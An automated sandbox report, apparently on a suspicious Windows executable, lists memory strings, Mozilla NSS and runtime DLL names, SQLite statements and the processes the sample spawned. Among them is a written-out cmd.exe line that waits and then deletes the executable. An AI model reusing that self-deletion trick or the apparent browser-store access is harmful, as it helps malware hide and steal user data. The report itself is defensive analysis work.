Source: 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471945444.000000001F9A4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000001.382378226.0000000000400000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.462683823.00000000203C4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.481283058.000000001F9A8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe	Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe

PE file contains strange resources

Source: 1COK25f1vT.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\1COK25f1vT.exe

Section loaded: crtdll.dll

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe"
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe"
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
